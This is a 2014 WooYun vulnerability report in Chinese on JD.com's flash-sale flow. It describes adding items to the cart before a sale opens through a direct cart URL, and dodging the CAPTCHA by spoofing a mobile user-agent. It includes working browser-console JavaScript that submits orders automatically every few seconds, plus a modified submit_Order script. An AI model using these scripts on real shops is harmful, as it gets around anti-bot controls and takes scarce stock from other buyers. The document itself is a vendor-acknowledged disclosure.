漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-055091
漏洞标题:京东商城商品抢购设计缺陷
相关厂商:京东商城
漏洞作者: H.Rui
提交时间:2014-03-31 11:17
修复时间:2014-05-15 11:17
公开时间:2014-05-15 11:17
漏洞类型:设计缺陷/逻辑错误
危害等级:低
自评Rank:5
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-03-31: 细节已通知厂商并且等待厂商处理中
2014-03-31: 厂商已经确认,细节仅向厂商公开
2014-04-10: 细节向核心白帽子及相关领域专家公开
2014-04-20: 细节向普通白帽子公开
2014-04-30: 细节向实习白帽子公开
2014-05-15: 细节向公众公开
简要描述:
京东抢购的两个Bug~
详细说明:
第一个Bug,就是抢购前就可以将商品加入购物车.
例如即将登场"华为荣耀3X"---http://item.jd.com/1085146.html这个商品,那么加入购物车只需要在地址栏键入http://cart.jd.com/cart/dynamic/gate.action?pid=185146&pcount=1&ptype=1 即可,至于商品编号,请随意更改
第二个Bug,京东在pc的web端加了验证码,但是在移动设备的页面没有验证,可以在浏览器快捷方式,在目标这一栏后面空格,再输入“--user-agent=”Android”即可,然后打开这个快捷方式即可模拟Android浏览环境。
漏洞证明:
那么如何利用第二个Bug呢,接下来只需登录http://m.jd.com/cart/cart.action,按F11打开开发者模式控制台,输入下面这段代码就可以无人值守抢购了,直接上代码,sid请大家自行更改成自己电脑的sid。
var sid="ab6c8fb4b26e4e2558171f50d2e01dd0";
setInterval(function() {
$.ajax({
type: "POST",
url: "http://m.jd.com/order/submit.action?sid="+sid,
async: false,
data: {
"order.idShipmentType": 65,
"order.idInvoiceHeaderType": 5,
"order.idInvoiceContentsType": 1,
"order.remark": "",
"order.idInvoiceType": 1
},
dataType: "text",
contentType: "application/x-www-form-urlencoded;charset=UTF-8",
timeout: 5000,
success: function(msg) {
if (msg.indexOf("您多次提交过快") != -1) {
console.log("您多次提交过快");
} else {
console.log("没货");
}
},
complete: function(XMLHttpRequest, textStatus) {}
});
},
3000);
那么如何实例运用这两个BUG来抢购呢?接下来以酷派大神F1为例进行示范。
第一步,提前登录,加入购物车:
http://cart.jd.com/cart/dynamic/gate.action?pid=1043963&pcount=1&ptype=1
第二步,去结算页面,并在控制台注入以下脚本。
function submit_Order(){var actionUrl=OrderAppConfig.Domain+"/order/submitOrder.action";var checkcodeTxt=null;var checkCodeRid=null;var payPassword=null;var remark=null;var trackID=null;var mobileForPresale=null;var param="";if(!$("#submit_check_info_message").is(":hidden")){var anchor=$("#anchor_info").val();window.location.hash=anchor;return}if(!isEmpty($("#checkCodeDiv").html())){checkcodeTxt=$("#checkcodeTxt").val();if(isEmpty(checkcodeTxt)){alert("请先填写验证码!");return}}if(!isEmpty($("#checkCodeDiv").html())){checkCodeRid=$("#checkcodeRid").val()}if(!$("#paypasswordPanel").is(":hidden")){payPassword=$("#txt_paypassword").val();if(isEmpty(payPassword)){alert("请先填写支付密码");return}}if($("#isPresale").val()=="true"){if(check_presaleMobile()){mobileForPresale=$("#userMobileByPresale").html()}else{alert("请您先输入有效的预售手机号");return}if($("#presaleEarnest").attr("checked")!=true){alert("请您同意交付定金");return}}if(!isEmpty($("#orderRemarkItem").html())){remark=$("#remarkText").val();if(remark=="限45个字"){remark=""}}if(!isEmpty(checkcodeTxt)){param=param+"submitOrderParam.checkcodeTxt="+checkcodeTxt}if(!isEmpty(checkCodeRid)){param=param+"&submitOrderParam.checkCodeRid="+checkCodeRid}trackID=$("#TrackID").val();if(!isEmpty(trackID)){param=param+"&submitOrderParam.trackID="+trackID}if(!isEmpty(payPassword)){param=param+"&submitOrderParam.payPassword="+encodeURIComponent(payPassword)}if(!isEmpty(remark)){param=param+"&submitOrderParam.remark="+remark}if(!isEmpty($("#sopNotPutInvoice").val())){param=param+"&submitOrderParam.sopNotPutInvoice="+$("#sopNotPutInvoice").val()}else{param=param+"&submitOrderParam.sopNotPutInvoice="+false}if(!isEmpty(mobileForPresale)){param=param+"&submitOrderParam.presaleMobile="+mobileForPresale}if(isGiftBuy()){var hidePrice=false;if(!$("#giftBuyHidePriceDiv").is(":hidden")){hidePrice=$("#giftBuyHidePrice").is(":checked")}param=param+"&submitOrderParam.giftBuyHidePrice="+hidePrice}var indexFlag=param.substring(0,1);if(indexFlag=="&"){param=param.substring(1,param.length)}var checkoutLoading=$('<span id="order-loading" class="checkout-state"><b></b>\u6B63\u5728\u63D0\u4EA4\u8BA2\u5355\uFF0C\u8BF7\u7A0D\u5019\uFF01</span>');var originSubmit=$("#order-submit").clone(true);$("#order-submit").replaceWith(checkoutLoading);param=addFlowTypeParam(param);jQuery.ajax({type:"POST",dataType:"json",url:actionUrl,data:param,cache:false,success:function(result){if(isUserNotLogin(result)){goToLogin();return}if(result.success){if(result.goJumpOrderCenter){successUrl="http://order.jd.com/center/list.action";window.setTimeout('window.location.href=successUrl+"?rd="+Math.random();',450);return}else{successUrl="http://s.trade.jd.com/success/success.action";window.location.href=successUrl+"?orderId="+result.orderId+"&rid="+Math.random();return}}else{if(result.message!=null){if(result.message.indexOf("商品无货")!=-1){var a=result.message.indexOf("编号为");var b=result.message.indexOf("的商品无货");var outSkus=result.message.substring(a+3,b);$("#order-loading").replaceWith(originSubmit);$("#submit_message").html(result.message);$("#submit_message").show();getNextCheckCode();if(!isEmpty(outSkus)){return}}else{if(result.message.indexOf("收货人信息中的省市县选择有误")!=-1){edit_Consignee()}else{if(result.message.indexOf("由于订单金额较大")!=-1){$("#order-loading").replaceWith(originSubmit);$("#submit_message").html(result.message);$("#submit_message").show();return}else{if(result.message.indexOf("验证码不正确")!=-1){$("#order-loading").replaceWith(originSubmit);$("#submit_message").html(result.message);$("#submit_message").show();getNextCheckCode();return}else{if(result.message.indexOf("正在参与预售活动")!=-1){var a=result.message.indexOf("您购买的商品");var b=result.message.indexOf("正在参与预售活动");var outSkus=result.message.substring(a+6,b);if(!isEmpty(outSkus)){var tmpHtml="";var skuList=outSkus.split(",");for(var i=0;i<skuList.length;i++){tmpHtml=tmpHtml+'<a target="_parent" href="http://item.jd.com/'+skuList[i]+'.html">'+skuList[i]+"</a>,"}tmpHtml=tmpHtml.substring(0,tmpHtml.length-1);result.message="您购买的商品"+tmpHtml+"正在参与预售活动,请进入商品详情页单独购买"}$("#order-loading").replaceWith(originSubmit);$("#submit_message").html(result.message);$("#submit_message").show()}else{$("#order-loading").replaceWith(originSubmit);$("#submit_message").html(result.message);$("#submit_message").show();getNextCheckCode();return}}}}}}else{$("#order-loading").replaceWith(originSubmit);$("#submit_message").html("亲爱的用户请不要频繁点击, 请稍后重试...");$("#submit_message").show();getNextCheckCode();return}}},error:function(error){$("#order-loading").replaceWith(originSubmit);$("#submit_message").html("亲爱的用户请不要频繁点击, 请稍后重试...");$("#submit_message").show();getNextCheckCode()}})}$(function(){setTimeout(function(){$("#checkcodeTxt").keypress(function(e){if(e.keyCode==13){submit_Order()}})},1000);$("#submit_message").css("top","0")});
第三步,如果你的浏览器为PC环境,就等待输入验证码,最佳间隔为3秒。如果你的浏览器已经为手机浏览环境,马上抢购成功!
修复方案:
版权声明:转载请注明来源 H.Rui@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:15
确认时间:2014-03-31 11:31
厂商回复:
谢谢对京东的关注
最新状态:
暂无